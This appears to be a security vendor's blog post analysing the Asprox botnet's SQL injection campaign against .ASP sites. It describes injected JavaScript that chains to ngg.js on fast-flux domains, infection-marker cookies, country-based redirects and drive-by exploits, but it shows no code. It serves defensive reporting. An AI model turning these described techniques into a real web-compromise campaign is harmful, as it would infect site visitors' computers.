Clever mnemonics aside, last week we have seen another large scale SQL injection attack (or YAMSIA, if you prefer), this time being orchestrated by a botnet that has become known as Asprox—but first, a history lesson.

The code behind the Asprox botnet seems to have been around for quite some time now, but it was only in the last year that it has upgraded to a botnet where its main focus is to send phishing emails. This has changed in late May / early June of this year when the bots where issued a new set of commands–namely to start searching the Web for certain .ASP pages – and then launching an SQL injection attack against these pages (hmm … I wonder where they got that idea from).

Figure 1. The modus operandi that has become more and more common.

Compromised sites have a piece of JavaScript (JS) embedded in them, which in turn points to another JS file on a seperate domain (the first technique has been taught in Bouncing Malware 101). These domains are part of a fast-flux network hosted on the botnet itself (a technique widely used by another well-known botnet, Storm). The JS file name was originally b.js, but this has since changed and, in the latest wave, it is the highly imaginative ngg.js.

Figure 2. Sample of malicious script (with some parts removed)

As you can see, this script creates a cookie that expires after 9 days. This serves as an infection marker on the page, as it then “bounces” the threat once more to the page pointed to by the iFrame.

Depending on what country you are browsing from, the Asprox botnet may decide not to let you access this page, in which case, you will be redirected to the legitimate www.msn.com. If you are “lucky” enough to be allowed access to the page, however, your browser will be promptly slapped in the face with a barrage of vulnerabilities–all with the goal of having your computer join in all of the fun by hooking your PC up to the botnet.

SQL injection attacks can be very effective as they are normally completely hidden to the Internet user—everything is quietly downloaded in the background without their knowledge. We were sure this was a criminal act, and as such have added a detection for the threat, as well as the bouncing JavaScript (JS_IFRAME.ADN) itself.

Unfortunately, security is still a major issue with the majority of Web sites, and until it becomes one of the core design goals from the start of a Web site project, expect to see more YAMSIA (Can you tell I’m trying to get this mnemonic to stick?) blogs in the future.